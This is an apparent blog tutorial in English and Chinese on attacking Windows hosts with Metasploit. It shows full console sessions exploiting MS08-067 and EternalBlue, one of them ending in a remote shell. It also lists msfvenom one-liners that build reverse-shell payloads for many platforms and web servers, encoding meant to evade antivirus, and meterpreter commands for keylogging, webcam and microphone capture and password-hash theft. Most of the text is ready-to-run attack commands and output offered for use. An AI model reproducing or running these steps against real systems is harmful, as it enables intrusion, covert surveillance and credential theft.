river

Don't be the same,Be Better!

how to use metasploit to attack

I’m sorry for my english,0^0

(1) on kali2 start shell and input msfconsole
here i will explain some args for msfconsole

[+++++]. banner
you would see banner for etasploit,which information useful is :

       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[+++++]. back
here:

 > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > back
msf > 

[+++++]check
when you use some module ,you can check target computer can be attacked or not

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.1.55
RHOST => 192.168.1.55
msf exploit(ms08_067_netapi) > check
[*] 192.168.1.55:445 The target is not exploitable.
msf exploit(ms08_067_netapi) > 

[+++++]connect
when you test target computer’s port

msf > connect 192.168.1.55 8000
[*] Connected to 192.168.1.55:8000

here has a tips: connect can use special srcaddress and srcport ,i remembered a ctf tester.

[+++++]info
which can use to look at module’s info

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <x@hdm.io>
  Brett Moore <brett.moore@insomniasec.com>
  frank2 <frank2@dc949.org>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese - Brazilian (NX)
  68  Windows 2003 SP2 Spanish (NO NX)
  69  Windows 2003 SP2 Spanish (NX)
  70  Windows 2003 SP2 Japanese (NO NX)
  71  Windows 2003 SP2 French (NO NX)
  72  Windows 2003 SP2 French (NX)

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.55     yes       The target address
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:
  https://cvedetails.com/cve/CVE-2008-4250/
  OSVDB (49243)
  https://technet.microsoft.com/en-us/library/security/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos

msf exploit(ms08_067_netapi) > 

[+++++]search
search is very useful,help info is here

msf exploit(ms08_067_netapi) > search -h
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client

example is here

“search name:mysql”‍‍
“search platform:mysql”  ---- can filter higer rank module
“search type:post”: --- metasploit can use three type (exploit \ auxiliary \ post)
“search author:dookie”
“search author:dookie name:MacOS

[+++++]‍‍Sessions
which can be allow manager session,when you hack target successful

[+++++]set
which can be use to set args for your attack target

[+++++]use
Oh,it very important and easy -^- biubiubiu

(2) here is example
[++++++]ms08_067

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.55     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > run

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.55:445 - Automatically detecting the target...
[*] 192.168.1.55:445 - Fingerprint: Windows 7 -  - lang:Unknown
[*] 192.168.1.55:445 - We could not detect the language pack, defaulting to English
[-] 192.168.1.55:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > 


OK,i failed ,but i believe you can success!

[++++++]ms17_010

msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms17_010_eternalblue 
msf exploit(ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   GroomAllocations    12               yes       Initial number of times to groom the kernel pool.
   GroomDelta          5                yes       The amount to increase the groom count by per try.
   MaxExploitAttempts  3                yes       The number of times to retry the exploit.
   ProcessName         spoolsv.exe      yes       Process to inject payload into.
   RHOST                                yes       The target address
   RPORT               445              yes       The target port (TCP)
   SMBDomain           .                no        (Optional) The Windows domain to use for authentication
   SMBPass                              no        (Optional) The password for the specified username
   SMBUser                              no        (Optional) The username to authenticate as
   VerifyArch          true             yes       Check if remote architecture matches exploit Target.
   VerifyTarget        true             yes       Check if remote OS matches exploit Target.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.55
RHOST => 192.168.1.55
msf exploit(ms17_010_eternalblue) > exploit 

[*] Started reverse TCP handler on 192.168.1.101:4444 
[*] 192.168.1.55:445 - Connecting to target for exploitation.
[+] 192.168.1.55:445 - Connection established for exploitation.
[+] 192.168.1.55:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.55:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.55:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.55:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600     
[+] 192.168.1.55:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.55:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.55:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.55:445 - Starting non-paged pool grooming
[+] 192.168.1.55:445 - Sending SMBv2 buffers
[+] 192.168.1.55:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.55:445 - Sending final SMBv2 buffers.
[*] 192.168.1.55:445 - Sending last fragment of exploit packet!
[*] 192.168.1.55:445 - Receiving response from exploit packet
[+] 192.168.1.55:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.55:445 - Sending egg to corrupted connection.
[*] 192.168.1.55:445 - Triggering free of corrupted buffer.
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.1.55:445 - Connecting to target for exploitation.
[+] 192.168.1.55:445 - Connection established for exploitation.
[+] 192.168.1.55:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.55:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.55:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 192.168.1.55:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 30                 sional 7600     
[+] 192.168.1.55:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.55:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.1.55:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.55:445 - Starting non-paged pool grooming
[+] 192.168.1.55:445 - Sending SMBv2 buffers
[+] 192.168.1.55:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.55:445 - Sending final SMBv2 buffers.
[*] 192.168.1.55:445 - Sending last fragment of exploit packet!
[*] 192.168.1.55:445 - Receiving response from exploit packet
[+] 192.168.1.55:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.55:445 - Sending egg to corrupted connection.
[*] 192.168.1.55:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.101:4444 -> 192.168.1.55:56666) at 2018-05-16 08:37:39 -0400
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.55:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>dir c:\
dir c:\
 Volume in drive C has no label.
 Volume Serial Number is 32F5-8E54

 Directory of c:\

04/23/2018  04:01 AM    <DIR>          3e8ad8e80165f13632b90d21195c66
07/13/2009  11:20 PM    <DIR>          PerfLogs
04/22/2018  10:48 PM    <DIR>          phpStudy
05/10/2018  02:43 AM    <DIR>          Program Files
05/14/2018  04:40 AM    <DIR>          Program Files (x86)
05/14/2018  11:24 PM    <DIR>          Python26
03/27/2018  08:33 AM    <DIR>          python27-x64
03/23/2018  04:52 AM    <DIR>          Users
05/16/2018  08:20 AM    <DIR>          Windows
05/15/2018  02:47 AM    <DIR>          ????
               0 File(s)              0 bytes
              10 Dir(s)  43,760,390,144 bytes free
OK ,i success and i believe you can do better!

(3)msfvenom
from

 http://cache.baiducontent.com/c?m=9f65cb4a8c8507ed19fa950d100b96314c0bd73f7a83835221928448e435061e5a24feb827211206d1c77e6403a94e57e0f73766725e60e19497df0c8efad07672d36123706dd90005d269accc5124b137902cfeae69e5bbf6&p=9379c64ad4911fff57ed977a4c4382&newp=8f769a47838801eb08e2947d090581231610db2151d1d401298ffe0cc4241a1a1a3aecbf2025110ed9ce766d00a94d5fedf333723d0034f1f689df08d2ecce7e7ac36770&user=baidu&fm=sc&query=metasploit+ms15%2D034&qid=b3674fc600004194&p1=2
作用:生成木马文件,替代早期版本的msfpayload和msfencoder。
Options

msfvenom命令行选项如下:    

-p, --payload <payload> 指定需要使用的payload(攻击荷载)
-l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all
-n, --nopsled <length> 为payload预先指定一个NOP滑动长度
-f, --format <format> 指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)
-e, --encoder [encoder] 指定需要使用的encoder(编码器)
-a, --arch <architecture> 指定payload的目标架构
 --platform <platform> 指定payload的目标平台
-s, --space <length> 设定有效攻击荷载的最大长度
-b, --bad-chars <list> 设定规避字符集,比如: &#039;\x00\xff&#039;
-i, --iterations <count> 指定payload的编码次数
-c, --add-code <path> 指定一个附加的win32 shellcode文件
-x, --template <path> 指定一个自定义的可执行文件作为模板
-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
 --payload-options 列举payload的标准选项
-o, --out <path> 保存payload
-v, --var-name <name> 指定一个自定义的变量,以确定输出格式
 --shellest 最小化生成payload
-h, --help 查看帮助选项
 --help-formats 查看msf支持的输出格式列表

options usage

查看支持的payload列表:

msfvenom -l payloads

查看支持的输出文件类型:

msfvenom --help-formats

查看支持的编码方式:(为了达到免杀的效果)

msfvenom -l encoders

查看支持的空字段模块:(为了达到免杀的效果)

msfvenom -l nops

基础payload

命令格式

msfvenom -p <payload> <payload options> -f <format> -o <path>

Linux
反向连接:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
正向连接:
msfvenom -p linux/x86/meterpreter/bind_tcp LHOST=<Target IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
Web Payloads

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp

JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.wa
Scripting Payloads

Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py

Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh

Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>

Mac Based Shellcode


msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Handlers

payload加编码

命令格式:
msfvenom -p <payload> <payload options> -a <arch> --platform <platform> -e <encoder option> -i <encoder times> -b <bad-chars> -n <nopsled> -f <format> -o <path>

常用编码:
x86/shikata_ga_nai
cmd/powershell_base64

例子:
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3 -f exe > 1.exe

自选模块

生成执行计算器payload例子:
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > 1.exe

(4)payload how to choose

linux相关payload:
linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/bind_tcp
linux/x86/shell_bind_tcp
linux/x86/shell_reverse_tcp
linux/x64/shell_reverse_tcp
linux/x64/shell_bind_tcp

windows相关payload:
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell_reverse_tcp
windows/shell_bind_tcp
windows/x64/meterpreter/reverse_tcp
windows/x64/meterpreter/bind_tcp
windows/x64/shell_reverse_tcp
windows/x64/shell_bind_tcp

连接木马

开启msf,启用exploit/multi/handler模块。

use exploit/multi/handler

set payload linux/x86/meterpreter/bind_tcp
show options

set RHOST 10.0.0.1

set LPORT 12345 
exploit
注意:这里set的payload跟生成木马使用的payload要一致,其余的参数根据选择的payload而填写。

(5)when you get a meterpreter shell……

meterpreter shell

当我们拿到目标服务器的meterpreter_shell后,可以进行很多操作。

backgroud 将msf进程放到后台
session -i 1 将进程拖回前台运行
run vnc 远程桌面的开启


**文件管理功能:**

Download 下载文件
Edit 编辑
cat 查看
mkdir 创建
mv 移动
rm 删除
upload 上传 
rmdir 删除文件夹

**网络及系统操作:**

Arp 看ARP缓冲表
Ifconfig IP地址网卡
Getproxy 获取代理
Netstat 查看端口链接
Kill 结束进程
Ps 查看进程
Reboot 重启电脑
Reg 修改注册表
Shell 获取shell
Shutdown 关闭电脑
sysinfo 获取电脑信息

**用户操作和其他功能讲解:**

enumdesktops 用户登录数
keyscan_dump   键盘记录-下载
keyscan_start  键盘记录 - 开始
keyscan_stop   键盘记录 - 停止
Uictl      获取键盘鼠标控制权
record_mic    音频录制
webcam_chat   查看摄像头接口
webcam_list   查看摄像头列表
webcam_stream  摄像头视频获取
Getsystem    获取高权限
Hashdump    下载HASH
阅读更多
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_20307987/article/details/80343072
个人分类: 内网渗透
想对作者说点什么? 我来说一句

没有更多推荐了,返回首页

不良信息举报

how to use metasploit to attack

最多只允许输入30个字

加入CSDN,享受更精准的内容推荐,与500万程序员共同成长!
关闭
关闭